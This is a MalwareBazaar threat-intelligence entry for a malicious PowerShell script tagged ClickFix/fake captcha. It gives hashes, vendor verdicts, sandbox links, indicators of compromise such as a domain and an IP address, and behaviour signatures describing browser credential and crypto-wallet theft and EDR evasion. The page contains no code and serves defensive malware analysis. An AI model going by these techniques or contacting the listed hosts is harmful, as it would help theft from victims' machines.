MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 9


Intelligence 9 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94
SHA3-384 hash: a4d097dd815ed43c068cff63f33f7163223278d76ba9c5c33fe9fdf4bfccc907ab27f5351be6f28cdeb5b4bfc13e42dd
SHA1 hash: 3fe59ad1877fdeb09846d4be8918996842ff9a00
MD5 hash: cbd24e3bdf207215f7c4467cd25951c9
humanhash: five-fourteen-seventeen-timing
File name:6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94.ps1
Download: download sample
File size:5'879 bytes
First seen:2025-05-13 06:43:47 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 96:/6atSq/9086BO2t624+cEkabKaY8tfnAilqHQs7JRXa26uai8gbFPayuFF1M6mV4:/6atN/90lP624JEka+n8tvANLJ+i8g0X
TLSH T157C1FE7AC931FDA4836D364051281D5A22845E17D3B31E7CCA297CF67E21716EF26A8C
Magika powershell
Reporter JAMESWT_WT
Tags:195-201-108-189 apioeaesr-icu booking ClickFix fakepcaptcha ps1

Intelligence

File Origin
# of uploads :
1
# of downloads :
101
Origin country :
IT IT
Vendor Threat Intelligence
Verdict:
Malicious
Score:
99.1%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6822ebab4a59e5a2ce042894
Tags:
obfuscate xtreme shell
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
base64 evasive obfuscated packed powershell powershell
Link:
https://www.filescan.io/uploads/6822ea3c0b64e174c4247c55/reports/e420cd66-b1a2-44d9-b210-2d086017cc5b/overview
Verdict:
Malicious
Labled as:
Backdoor/Meterpreter.p
Link:
https://www.hybrid-analysis.com/sample/6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94
Result
Threat name:
n/a
Detection:
malicious
Classification:
spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1688609
Signature
AI detected malicious Powershell script
Antivirus / Scanner detection for submitted sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Yara detected Powershell decode and execute
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1688609 Sample: khuYmeJA58.ps1 Startdate: 13/05/2025 Architecture: WINDOWS Score: 100 50 www.ip-api.com 2->50 52 apioeaesr.icu 2->52 60 Suricata IDS alerts for network traffic 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Antivirus / Scanner detection for submitted sample 2->64 66 6 other signatures 2->66 10 powershell.exe 11 2->10         started        13 237b2cb5-30d4-4431-8a71-932a0529b376.exe 2->13         started        signatures3 process4 signatures5 78 Suspicious powershell command line found 10->78 80 Found many strings related to Crypto-Wallets (likely being stolen) 10->80 82 Encrypted powershell cmdline option found 10->82 86 2 other signatures 10->86 15 powershell.exe 15 17 10->15         started        19 conhost.exe 10->19         started        84 Found direct / indirect Syscall (likely to bypass EDR) 13->84 process6 dnsIp7 58 apioeaesr.icu 104.21.14.228, 443, 49685 CLOUDFLARENETUS United States 15->58 48 237b2cb5-30d4-4431-8a71-932a0529b376.exe, PE32+ 15->48 dropped 21 237b2cb5-30d4-4431-8a71-932a0529b376.exe 75 15->21         started        file8 process9 dnsIp10 54 195.201.108.189, 33336, 49689, 49690 HETZNER-ASDE Germany 21->54 56 www.ip-api.com 208.95.112.1, 49688, 80 TUT-ASUS United States 21->56 68 Found many strings related to Crypto-Wallets (likely being stolen) 21->68 70 Tries to harvest and steal browser information (history, passwords, etc) 21->70 72 Tries to steal Crypto Currency Wallets 21->72 74 Found direct / indirect Syscall (likely to bypass EDR) 21->74 25 powershell.exe 38 21->25         started        28 powershell.exe 37 21->28         started        30 powershell.exe 21->30         started        32 47 other processes 21->32 signatures11 process12 signatures13 76 Loading BitLocker PowerShell Module 25->76 34 conhost.exe 25->34         started        36 conhost.exe 28->36         started        38 conhost.exe 30->38         started        40 conhost.exe 32->40         started        42 conhost.exe 32->42         started        44 conhost.exe 32->44         started        46 44 other processes 32->46 process14
Score:
98%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94/
Threat name:
Script-PowerShell.Trojan.FakeCaptcha
Create hunting rule
Status:
Malicious
First seen:
2025-05-13 06:42:06 UTC
File Type:
Text (Batch)
AV detection:
9 of 22 (40.91%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=me43tqxrjherlwylfh4wlgijxbh4nr2gz6hjkh557i7ch6kzr2ka._file
Result
Malware family:
n/a
Score:
  8/10
Tags:
execution spyware stealer
Link:
https://tria.ge/reports/250513-hhj4fsssfx/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Drops file in System32 directory
Accesses cryptocurrency files/wallets, possible credential harvesting
Executes dropped EXE
Reads user/profile data of web browsers
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments